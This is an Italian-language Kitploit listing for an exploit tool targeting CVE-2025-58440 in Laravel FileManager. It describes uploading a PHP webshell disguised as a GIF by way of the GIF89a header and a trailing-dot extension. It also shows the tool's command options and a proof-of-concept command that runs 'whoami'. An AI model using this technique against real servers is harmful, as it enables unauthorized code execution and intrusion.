Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-58440 — Esecuzione Remota di Codice (RCE) tramite Attacco File Poliglotta e Iniezione di Byte Nulli su Laravel FileManager | Kitploit
Strumenti/GitHubGitHub/ph-hitachi/cve-2025-58440
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubph-hitachi/cve-2025-58440

CVE-2025-58440

Esecuzione Remota di Codice (RCE) tramite Attacco File Poliglotta e Iniezione di Byte Nulli su Laravel FileManager

Vedi Repository
3211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-58440

Esecuzione di codice remoto (RCE) tramite attacco di file poliglotta e iniezione di byte nulli su Laravel FileManager

Panoramica

Il pacchetto unisharp/laravel-filemanager versione 2.11 è vulnerabile a Esecuzione di codice remoto (RCE) a causa di una convalida impropria del tipo di file durante il caricamento. La vulnerabilità consente a un attaccante di caricare un file PHP malevolo camuffato da immagine GIF sfruttando la convalida dell'estensione del file. In particolare, l'attaccante può aggiungere un punto (.) all'estensione .php e includere l'intestazione GIF89a; per far apparire il file come un'immagine, bypassando i controlli di convalida. Ciò consente all'attaccante di eseguire codice PHP arbitrario sul server, portando a Esecuzione di codice remoto (RCE).

  • Demo di configurazione Docker

Utilizzo

root@kitploit:~
python3 CVE-2025-58440.py <target> [--flags]

Laravel File Manager  Exploit (CVE-2025-58440)

positional arguments:
  target                Target URL (e.g., 127.0.0.1:8000)

options:
  -h, --help                           show this help message and exit
  -C, --cookie COOKIE                  Session cookies
  -d, --directory DIRECTORY            Working directory (default: /tmp)
  -f, --filename FILENAME              Filename to upload (default: random)
  -p, --payload COMMAND                Command to execute through the webshell (e.g., 'id', 'whoami') (default: id)

Prova di Concetto

root@kitploit:~
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
image
Scarica lo strumento